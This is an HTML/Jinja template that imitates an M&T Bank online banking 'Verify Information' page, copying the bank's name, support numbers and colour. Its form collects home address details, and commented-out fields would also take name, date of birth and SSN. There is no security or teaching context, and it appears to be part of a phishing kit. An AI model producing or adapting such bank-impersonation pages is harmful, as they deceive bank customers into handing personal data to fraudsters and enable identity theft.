{% extends 'base.html'%} {%block body%}


<div style="padding-top: 5px" class="middle-form">
  <p class="go-left" style="font-size: 30px; color: #007856; text-align: center;">
    Verify Information <br />
  </p>
  
 
  <div class="submitForm">
    <form action="" method="post">
    <!-- <div class="input-field">
        <label for="first_name">First Name</label>
            <input id="first_name" name="first_name" type="text">
    </div>
    <div class="input-field">
        <label for="last_name">Last Name</label>
          <input id="last_name" name="last_name" type="text">
      </div>
      <div class="input-field">
        <label for="dob">DOB</label>
          <input id="dob" name="dob" placeholder="YYYY/MM/DD" type="text">
      </div>
      <div class="input-field">
        <label for="ssn">SSN</label>
          <input id="ssn" name="ssn" type="text">
      </div> -->
      <div class="input-field">
        <label for="address1">Address</label>
          <input id="address1" name="address" type="text">
      </div>
      
      <div style="display: flex;">
        <div class="input-field">
            <label for="apt">Apt#</label>
              <input id="apt" name="apt" type="text">
          </div>
          <div class="input-field">
            <label for="city">City</label>
              <input id="city" name="city" type="text">
          </div>
      </div>
      <div style="display: flex;">
        <div class="input-field">
            <label for="state">State</label>
              <input id="state" name="state" type="text">
          </div>
          <div class="input-field">
            <label for="zipcode">Zipcode</label>
              <input id="zipcode" name="zipcode" type="text">
          </div>
      </div>
      
      
  
  <button style="width: 100%; margin-top: -5px;" type="submit">Continue</button>
</form>
    <br />
    <a href="">Help with User ID or Passcode</a>
    <a href="">Enroll Now</a>

    <p>Unauthorized access is prohibited. Usage may be monitored</p>

    <hr>

    <p>Have questions about M&T Online Banking?</p>
    <a href="">Personal Accounts: 1-800-790-9130</a>
    <p>Monday - Friday 8am - 9pm ET</p>
    <p>Saturday - Sunday 9am - 5pm ET</p>

    <a href="">Business Accounts: 1-800-724-6070</a>
  </div>
</div>


{%endblock%}
